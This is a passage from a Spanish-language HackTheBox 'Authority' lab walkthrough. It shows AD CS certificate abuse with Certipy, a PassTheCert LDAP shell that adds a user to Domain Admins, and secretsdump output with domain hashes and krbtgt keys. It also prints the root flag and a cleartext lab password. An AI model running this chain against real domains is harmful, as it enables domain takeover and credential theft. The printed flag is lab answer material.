Certipy v4.7.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve '' at '10.10.11.222'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.222[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.222[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 19
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
 π ~/htb/authority/adcs ❯

Al intentar realizar la autenticacion con la flag auth nos muestra el error KDC_ERR_PADATA_TYPE_NOSUPP.

1
2
3
4
5
6
7

 π ~/htb/authority/adcs ❯ certipy auth -pfx administrator.pfx
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
 π ~/htb/authority/adcs ❯

PassTheCert

Segun el post Certificates and Pwnage and Patches, Oh My! es un error de autenticacion en Kerberos, se sugiere la tool PassTheCert existe en version C# y Python, (Ref. error).

Nos guiamos de la documentacion de la tool. Extraemos key y cert desde .pfx.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# certipy cert -pfx administrator.pfx -nokey -out user.crt
# certipy cert -pfx administrator.pfx -nocert -out user.key
 π ~/htb/authority/adcs ❯ certipy cert -pfx administrator.pfx -nokey -out user.crt
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Writing certificate and  to 'user.crt'
 π ~/htb/authority/adcs ❯ certipy cert -pfx administrator.pfx -nocert -out user.key
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Writing private key to 'user.key'
 π ~/htb/authority/adcs ❯

Con ello podemos ejecutar passthecert utilizando la key y el certificado, en este caso ejecutamos una de las acciones la cual es una shell ldap que nos permitiria agregar al usuario svc_ldap al grupo de “Domain Admins”, si todo va bien el resultado es “OK”.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# Spawn an interactive LDAP shell and add a user to a specific domain group
# python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain authority.htb -dc-ip 10.10.11.222
 π ~/htb/authority/adcs ❯ python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain authority.htb -dc-ip 10.10.11.222
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Type help for list of commands

# add_user_to_group svc_ldap "Domain Admins"
Adding user: svc_ldap to group Domain Admins result: OK

#

Regresamos a la shell de svc_ldap y observamos que el usuario pertenece al grupo de administradores.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> whoami /all

USER INFORMATION
----------------

User Name    SID
============ =============================================
htb\svc_ldap S-1-5-21-622327497-3269355298-2248959698-1601


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                          Attributes
========================================== ================ ============================================ ===============================================================
Everyone                                   Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544                                 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
HTB\Domain Admins                          Group            S-1-5-21-622327497-3269355298-2248959698-512 Mandatory group, Enabled by default, Enabled group
HTB\Denied RODC Password Replication Group Alias            S-1-5-21-622327497-3269355298-2248959698-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc_ldap\Documents>

System

Lo que finalmente nos permite leer la flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> cd C:/users/administrator
*Evil-WinRM* PS C:\users\administrator> cd Desktop
*Evil-WinRM* PS C:\users\administrator\Desktop> ls


    Directory: C:\users\administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/10/2023  11:40 PM             34 root.txt


*Evil-WinRM* PS C:\users\administrator\Desktop> cat root.txt
4ec6f508db9f7cf43a1b00226101acc2
*Evil-WinRM* PS C:\users\administrator\Desktop>

Como resultado, tambien podemos ejecutar secretsdump.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

 π ~/htb/authority/adcs ❯ impacket-secretsdump authority.htb/svc_ldap:'lDaP_1n_th3_cle4r!'@authority.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x31f4629800790a973f9995cec47514c6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a15217bb5af3046c87b5bb6afa7b193e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
HTB\AUTHORITY$:aes256-cts-hmac-sha1-96:969909879c4836ac228ba0786bfda7ebd43c7ccb1991e7c73399aace6e791a12
HTB\AUTHORITY$:aes128-cts-hmac-sha1-96:0fca97fe7acfd165cf061b5e482dc764
HTB\AUTHORITY$:des-cbc-md5:bf91ba0149400734
HTB\AUTHORITY$:plain_password_hex:17d962462582b7b2e846d6b8a477fb9d0e851995e77f73d8eb93abce3811c89d2811aa4c745659813a88cc4ef5240c34cadbf53037856d82591b782829d3ca2df5650c551ff21afd7a5e491e1f8ffd1ceea899c5aa54a41e90b7eeca70e0fe7c3d16906cc270f4bbd9557aba4e85f55d15178489bb272ce19949fc670a16cb2ce5d1c4ceb29c3003b5f7b6241bcecda290e18079d6372e90187a80ff00f35825b23c29abf9bea0d2051587fea2191e014c227c3c1a784108abf36893fddae811ed622115e4d5204679b1ef89a05b52a5cdd952db0c2cec2bd04e75f55a7af75e5aa84ffbd07cfded847e1dd25a15ccc6
HTB\AUTHORITY$:aad3b435b51404eeaad3b435b51404ee:e820d935f0261ebf08eac34dde0fb0bf:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xd5d60027f85b1132cef2cce88a52670918252114
dpapi_userkey:0x047c1e3ad8db9d688c3f1e9ea06c8f2caf002511
[*] NL$KM
 0000   F9 41 4F E3 80 49 A5 BD  90 2D 68 32 F7 E3 8E E7   .AO..I...-h2....
 0010   7F 2D 9B 4B CE 29 B0 E6  E0 2C 59 5A AA B7 6F FF   .-.K.)...,YZ..o.
 0020   5A 4B D6 6B DB 2A FA 1E  84 09 35 35 9F 9B 2D 11   ZK.k.*....55..-.
 0030   69 4C DE 79 44 BA E1 4B  5B BC E2 77 F4 61 AE BA   iL.yD..K[..w.a..
NL$KM:f9414fe38049a5bd902d6832f7e38ee77f2d9b4bce29b0e6e02c595aaab76fff5a4bd66bdb2afa1e840935359f9b2d11694cde7944bae14b5bbce277f461aeba
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6961f422924da90a6928197429eea4ed:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bd6bd7fcab60ba569e3ed57c7c322908:::
svc_ldap:1601:aad3b435b51404eeaad3b435b51404ee:6839f4ed6c7e142fed7988a6c5d0c5f1:::
AUTHORITY$:1000:aad3b435b51404eeaad3b435b51404ee:e820d935f0261ebf08eac34dde0fb0bf:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72c97be1f2c57ba5a51af2ef187969af4cf23b61b6dc444f93dd9cd1d5502a81
Administrator:aes128-cts-hmac-sha1-96:b5fb2fa35f3291a1477ca5728325029f
Administrator:des-cbc-md5:8ad3d50efed66b16
krbtgt:aes256-cts-hmac-sha1-96:1be737545ac8663be33d970cbd7bebba2ecfc5fa4fdfef3d136f148f90bd67cb
krbtgt:aes128-cts-hmac-sha1-96:d2acc08a1029f6685f5a92329c9f3161
krbtgt:des-cbc-md5:a1457c268ca11919
svc_ldap:aes256-cts-hmac-sha1-96:3773526dd267f73ee80d3df0af96202544bd2593459fdccb4452eee7c70f3b8a
svc_ldap:aes128-cts-hmac-sha1-96:08da69b159e5209b9635961c6c587a96
svc_ldap:des-cbc-md5:01a8984920866862
AUTHORITY$:aes256-cts-hmac-sha1-96:969909879c4836ac228ba0786bfda7ebd43c7ccb1991e7c73399aace6e791a12
AUTHORITY$:aes128-cts-hmac-sha1-96:0fca97fe7acfd165cf061b5e482dc764
AUTHORITY$:des-cbc-md5:4abfa41fcbd0d0ef
[*] Cleaning up...
 π ~/htb/authority/adcs ❯

Otra de las acciones que nos permite este pequeno script es la de modificar un usuario, en este caso modificar la contrasena del usuario administrador sin modificar al usuario svc_ldap, entre otras acciones que se presentan en la documentacion.

1
2
3

passthecert.py -action modify_user -crt user.crt -key user.key \
			-domain authority.htb -dc-ip 10.10.11.222  \
			-target administrator -new-pass
Share on
Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe

Read other posts

HackTheBox - Authority